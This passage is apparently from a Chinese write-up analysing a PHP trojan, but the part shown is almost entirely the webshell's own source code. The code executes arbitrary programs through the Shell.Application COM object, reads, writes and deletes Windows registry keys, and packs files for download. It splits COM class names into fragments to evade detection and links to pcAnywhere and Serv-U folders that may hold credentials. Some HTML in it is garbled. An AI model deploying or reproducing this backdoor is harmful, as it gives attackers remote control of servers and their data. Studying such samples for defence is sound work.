php 木马的分析(加密破解)

        echo $code;
        exit;
        }else{
         $fp = @fopen("".$dir."/".$localfile."","w");
         echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功！!" : "目录".$dir."无可写权限!";
         @fclose($fp);
        }
        }
    } else {
        echo "请选择要打包下载的文件!";
    }
}
// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
    $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
    $a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
    echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}
// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
    echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
    $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
    var_dump(@$shell->RegRead($_POST['readregname']));
}

// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
    $shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
    $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
    echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
    $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
    $a = @$shell->RegDelete($_POST['delregname']);
    echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}
else {
    echo "$notice";
    echo "<a href="" href="""?dir=C:/Program%20Files/">Program</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere">pcAnywhere</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序">开始程序</a> | <a href="" href="""?dir=C:/Documents%20and%20Settings/All%20Users">AllUsers</a> | <a href="" href="""?dir=C:/Program Files/RhinoSoft.com/Serv-U">Serv-U</a> | ";